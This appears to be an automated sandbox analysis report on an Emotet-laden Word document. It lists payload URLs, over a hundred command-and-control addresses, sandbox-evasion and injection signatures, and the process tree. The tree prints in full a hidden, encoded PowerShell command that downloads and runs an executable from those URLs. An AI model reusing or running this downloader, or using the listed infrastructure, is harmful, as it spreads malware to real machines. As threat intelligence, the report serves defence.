Analysis
-
max time kernel
28s -
resource
win10v191014 -
submitted
14-01-2020 14:54
General
Malware Config
Extracted
https://www.tcjsl.com/wp-admin/o8FK323881/
https://tecjofer.com/wp-includes/zA1kTqXJD/
https://ribatturk.com/wp-includes/54M9uFGym/
https://beluxuryre.com/sandbox/2G537/
https://www.allowmefirstbuildcon.com/calendar/7x/
Extracted
emotet
70.184.69.146:80
186.177.165.196:443
139.47.135.215:80
192.241.143.52:8080
159.65.241.220:8080
45.79.95.107:443
69.163.33.84:8080
177.34.142.163:80
200.123.183.137:443
2.47.112.72:80
190.17.44.48:80
187.54.225.76:80
190.219.149.236:80
190.100.153.162:443
58.171.38.26:80
91.205.215.57:7080
152.231.89.226:80
94.176.234.118:443
201.213.100.141:8080
203.25.159.3:8080
110.142.161.90:443
46.101.212.195:8080
178.79.163.131:8080
151.80.142.33:80
79.7.158.208:80
191.183.21.190:80
188.216.24.204:80
113.190.254.245:80
87.106.46.107:8080
120.150.247.164:80
80.11.158.65:8080
203.130.0.69:80
50.28.51.143:8080
129.205.201.163:80
149.62.173.247:8080
177.242.21.126:80
200.45.187.90:80
77.55.211.77:8080
190.210.236.139:80
202.62.39.111:80
138.68.106.4:7080
2.45.112.134:80
83.165.78.227:80
76.69.26.71:80
207.154.204.40:8080
212.71.237.140:8080
58.162.218.151:80
189.201.197.98:8080
68.187.160.28:443
190.151.5.130:443
151.231.7.154:80
91.83.93.124:7080
200.58.83.179:80
187.188.166.192:8080
96.61.113.203:80
72.29.55.174:80
181.30.61.163:443
94.200.114.162:80
190.191.82.216:80
200.82.170.231:80
97.120.32.227:80
186.15.52.123:80
89.211.114.203:80
188.135.15.49:80
86.42.166.147:80
204.225.249.100:7080
45.8.136.201:80
37.187.6.63:8080
190.195.129.227:8090
192.241.146.84:8080
68.174.15.223:80
200.55.53.7:80
79.7.114.1:80
91.74.175.46:80
85.105.241.192:80
181.129.96.162:990
181.10.204.106:80
110.170.65.146:80
181.29.101.13:8080
189.26.118.194:80
188.218.104.226:80
104.131.58.132:8080
217.199.160.224:8080
139.162.118.88:8080
113.61.76.239:80
118.36.70.245:80
93.144.226.57:80
87.106.77.40:7080
186.68.48.204:443
142.93.114.137:8080
181.36.42.205:443
181.30.61.163:80
46.28.111.142:7080
181.167.96.215:80
94.200.126.42:80
86.123.138.76:80
14.201.35.38:80
179.208.84.218:8080
5.196.35.138:7080
216.251.83.79:80
68.183.170.114:8080
2.42.173.240:80
91.117.159.233:80
165.228.195.93:80
59.120.5.154:80
114.109.179.60:80
99.252.27.6:80
45.73.157.243:8080
185.94.252.12:80
119.59.124.163:8080
62.15.36.103:443
185.160.212.3:80
62.75.143.100:7080
185.86.148.222:8080
191.103.76.34:443
172.104.169.32:8080
181.231.220.232:80
82.196.15.205:8080
81.16.1.45:80
62.75.160.178:8080
109.169.86.13:8080
81.213.78.151:443
189.19.81.181:443
190.186.164.23:80
185.160.229.26:80
68.183.190.199:8080
190.210.184.138:995
Signatures
-
Suspicious use of SetWindowsHookEx 3 IoCs
Processes:
WINWORD.EXE508.exe508.exepid process 4868 WINWORD.EXE 4528 508.exe 4688 508.exe -
Suspicious use of WriteProcessMemory 2 IoCs
Processes:
powershell.exe508.exedescription pid process target process PID 1924 wrote to memory of 4528 1924 powershell.exe 508.exe PID 4528 wrote to memory of 4688 4528 508.exe 508.exe -
Executes dropped EXE 2 IoCs
Processes:
508.exe508.exepid process 4528 508.exe 4688 508.exe -
Suspicious behavior: EmotetMutantsSpam 1 IoCs
Processes:
508.exepid process 4688 508.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
WINWORD.EXEpid process 4868 WINWORD.EXE -
Process spawned unexpected child process 1 IoCs
Processes:
powershell.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1924 1992 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 1924 powershell.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 1924 powershell.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\303c83d7c5144514e0e1ec75306981442078f9c634f3719612309701d4c29573.doc" /o ""1⤵
- Suspicious use of SetWindowsHookEx
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Checks processor information in registry
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -w hidden -en JABVAHAAdwBpAHoAdAB5AGIAPQAnAEUAawBjAGkAYgBuAG4AeAByACcAOwAkAEYAbAB3AGQAZABvAG0AZABzAGMAYgAgAD0AIAAnADUAMAA4ACcAOwAkAFcAZABsAHQAdwB3AGkAcwBmAG8APQAnAFQAaABkAGIAdQBsAGEAbQBoAGYAJwA7ACQAUQByAGsAbwB3AGEAawB0AGUAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEYAbAB3AGQAZABvAG0AZABzAGMAYgArACcALgBlAHgAZQAnADsAJABCAGYAawBxAGUAZgBqAGMAdwBsAHQAdAA9ACcAVwBjAHMAZgBhAHAAaABzAG8AJwA7ACQARgBxAGwAawByAHEAdAB4AGMAcwBpAD0AJgAoACcAbgAnACsAJwBlAHcAJwArACcALQAnACsAJwBvAGIAagBlAGMAdAAnACkAIABuAGUAdAAuAFcARQBiAGMATABJAEUAbgBUADsAJABYAHcAZQBnAG4AagBvAHUAYgBuAHcAeABuAD0AJwBoAHQAdABwAHMAOgAvAC8AdwB3AHcALgB0AGMAagBzAGwALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAG8AOABGAEsAMwAyADMAOAA4ADEALwAqAGgAdAB0AHAAcwA6AC8ALwB0AGUAYwBqAG8AZgBlAHIALgBjAG8AbQAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAHoAQQAxAGsAVABxAFgASgBEAC8AKgBoAHQAdABwAHMAOgAvAC8AcgBpAGIAYQB0AHQAdQByAGsALgBjAG8AbQAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvADUANABNADkAdQBGAEcAeQBtAC8AKgBoAHQAdABwAHMAOgAvAC8AYgBlAGwAdQB4AHUAcgB5AHIAZQAuAGMAbwBtAC8AcwBhAG4AZABiAG8AeAAvADIARwA1ADMANwAvACoAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AYQBsAGwAbwB3AG0AZQBmAGkAcgBzAHQAYgB1AGkAbABkAGMAbwBuAC4AYwBvAG0ALwBjAGEAbABlAG4AZABhAHIALwA3AHgALwAnAC4AIgBTAHAAYABsAEkAVAAiACgAJwAqACcAKQA7ACQATABkAGcAbQBzAGIAcQBrAHIAcwA9ACcAUwBvAGEAZQBhAG4AaQBvAGsAZAAnADsAZgBvAHIAZQBhAGMAaAAoACQAVwBtAHIAbwBoAGEAbwB4AGwAaQBtACAAaQBuACAAJABYAHcAZQBnAG4AagBvAHUAYgBuAHcAeABuACkAewB0AHIAeQB7ACQARgBxAGwAawByAHEAdAB4AGMAcwBpAC4AIgBkAGAAbwBgAFcATgBsAE8AYABBAGQAZgBpAEwAZQAiACgAJABXAG0AcgBvAGgAYQBvAHgAbABpAG0ALAAgACQAUQByAGsAbwB3AGEAawB0AGUAKQA7ACQAWQB0AGIAZQBkAGwAagBxAHIAZwB0AD0AJwBRAGUAagBjAGkAZwBtAGYAJwA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtAEkAJwArACcAdABlAG0AJwApACAAJABRAHIAawBvAHcAYQBrAHQAZQApAC4AIgBsAEUAbgBgAEcAYABUAGgAIgAgAC0AZwBlACAAMwAzADMAOQAzACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAHMAVABgAEEAcgBUACIAKAAkAFEAcgBrAG8AdwBhAGsAdABlACkAOwAkAEEAawBoAGUAZwBmAHoAaABuAHIAbgB5AD0AJwBIAGYAagBhAHUAbAB1AHkAYgBrACcAOwBiAHIAZQBhAGsAOwAkAEwAYgB4AGMAagBnAHQAagBlAHMAZQBmAGsAPQAnAE0AbwBsAGMAZgBqAHEAYgBhACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFgAcAB4AGIAagB4AHUAaQB1AD0AJwBMAGkAaABmAHEAaABvAGIAZQBxACcA1⤵
- Suspicious use of WriteProcessMemory
- Process spawned unexpected child process
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\508.exe"C:\Users\Admin\508.exe"2⤵
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
- Executes dropped EXE
-
C:\Users\Admin\508.exe--669ff01b3⤵
- Suspicious use of SetWindowsHookEx
- Executes dropped EXE
- Suspicious behavior: EmotetMutantsSpam
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\508.exe
-
C:\Users\Admin\508.exe
-
C:\Users\Admin\508.exe
-
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-634046074-2673730973-2644684987-1000\0f5007522459c86e95ffcc62f32308f1_293fa5bd-edfb-4bba-800e-a7dce3ea3438
-
memory/4528-7-0x0000000002280000-0x0000000002297000-memory.dmpFilesize
92KB
-
memory/4688-10-0x0000000000520000-0x0000000000537000-memory.dmpFilesize
92KB
-
memory/4688-11-0x0000000000400000-0x0000000000480000-memory.dmpFilesize
512KB